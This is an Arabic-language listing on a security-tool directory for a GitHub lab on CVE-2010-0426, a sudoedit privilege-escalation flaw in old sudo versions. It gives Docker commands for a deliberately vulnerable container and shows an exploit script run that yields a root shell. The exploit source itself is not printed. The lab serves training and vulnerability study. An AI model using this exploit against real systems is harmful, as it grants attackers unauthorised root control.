Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 و 1.7.x <= 1.7.2p4 تصعيد الامتيازات المحلية وحاوية قابلة للاختراق | Kitploit
أدوات/GitHubGitHub/t0kx/privesc-cve-2010-0426
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 و 1.7.x <= 1.7.2p4 تصعيد الامتيازات المحلية وحاوية قابلة للاختراق

عرض المستودع
11134منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Sudo 1.6.x<=1.6.9p21 و 1.7.x<=1.7.2p4 تصعيد الامتيازات المحلي

Sudo (su "do") يسمح لمسؤول النظام بمنح مستخدمين معينين (أو مجموعات من المستخدمين) القدرة على تشغيل بعض (أو كل) الأوامر كجذر مع تسجيل جميع الأوامر والوسائط.

البيئة القابلة للاختراق

لإعداد بيئة قابلة للاختراق لاختبارك ستحتاج إلى تثبيت Docker، ثم قم بتشغيل الأمر التالي:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

وسيُظهر غلاف تفاعلي بصلاحيات مستخدم منخفضة.

الكود القابل للاختراق

تم العثور على الخلل في sudoedit، الذي لا يتعامل مع الأمر 'sudoedit' بشكل صحيح، مما يسمح لمستخدم ضار باستبدال الأمر sudoedit الحقيقي بأمر عشوائي.

يمكن للمهاجمين المحليين استغلال هذه المشكلة لتشغيل أوامر عشوائية كمستخدم 'root'. يمكن للاستغلالات الناجحة اختراق الحاسوب المتأثر بالكامل.

الاستغلال

لاستغلال هذا الهدف فقط قم بتشغيل:

root@kitploit:~
./exploit.sh

إذا كنت تستخدم هذه الصورة القابلة للاختراق، يمكنك فقط تشغيل:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

الاعتمادات

تم اكتشاف هذا العيب بواسطة Slouching.

إخلاء المسؤولية

هذا البرنامج أو البرنامج السابق هو لأغراض تعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (t0kx) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. المؤلف أو أي مزود إنترنت لا يتحمل أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذه البرامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية t0kx.

تنزيل الأداة